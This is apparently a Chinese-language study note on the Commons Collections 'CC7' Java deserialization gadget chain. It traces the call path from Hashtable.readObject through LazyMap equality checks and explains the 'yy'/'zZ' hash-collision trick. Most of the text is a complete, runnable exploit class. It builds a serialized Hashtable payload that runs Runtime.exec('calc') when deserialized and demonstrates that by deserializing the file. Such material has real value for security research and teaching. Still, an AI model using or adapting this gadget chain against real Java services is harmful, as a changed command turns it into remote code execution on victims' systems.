环境准备

和cc1一样

分析

我们先来看一下hashtable这个类的readobject方法

img

调用了reconstitutionPut方法,跟进一下,

img

我们需要调用equals,这里肯定要满足两个key了,并且两个lazymap的hashcode还必须相等然后调用lazymap的equals,他没有,那就找他的父类AbstractMapDecorator,

img

这就调用了map的equals了,如果你的lazymap构造的时候用的是一个hashmap,那就会调用了hashmap的equals,依旧没有,那就找他的父类,

img

在这里就调用了get,这样就到了这里,然后就是绕过的点了

img

前面已经讲了要两个LazyMap的hashcode相等,使用即可

1
2
lazymap1.put("yy",1);
lazymap2.put("zZ",1);

img

然后会lazymap2会多一个yy=yy,不会调用transform了,所以要移除掉,加个remove就行了。

要先传一个空的transform,防止put调用equals,提前执行。然后在用反射改回来

剩下的尾部都一样

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.TransformerFactory;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class cc7 {
    public static void main(String[] args) throws Exception {

        Class c = Runtime.class;
//        Method m = c.getDeclaredMethod("getRuntime",null);
//        m.setAccessible(true);
//        Object invoke = m.invoke(null, null);
//        Method m2 = c.getDeclaredMethod("exec",String.class);
//        m2.setAccessible(true);
//        m2.invoke(invoke,"calc");

        Transformer[] t = {
                new ConstantTransformer(c),
                new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class},new Object[]{"calc"})
        };
        Transformer[] tr ={};

        ChainedTransformer chainedTransformer = new ChainedTransformer(tr);
        Map map1 = new HashMap<>();

        Map map2 = new HashMap<>();

       Map<Object,Object> lazymap1 = LazyMap.decorate(map1,chainedTransformer);
       lazymap1.put("yy",1);

       Map<Object,Object> lazymap2 = LazyMap.decorate(map2,chainedTransformer);
       lazymap2.put("zZ",1);


        Hashtable hashtable = new Hashtable();
        hashtable.put(lazymap1,1);
        hashtable.put(lazymap2,2);

        Class aClass = chainedTransformer.getClass();
        Field f = aClass.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(chainedTransformer, t);
        lazymap2.remove("yy");
        searilize(hashtable);
        unsearilize("ser.bin");


//        Method getDeclaredMethod = (Method) new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}).transform(c);
//        Object invoke1 = new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}).transform(getDeclaredMethod);
//        new InvokerTransformer("exec", new Class[]{String.class},new Object[]{"calc"}).transform(invoke1);


    }

    public static void searilize(Object o) throws Exception {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(o);
    }
    public static Object unsearilize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        return objectInputStream.readObject();
    }
}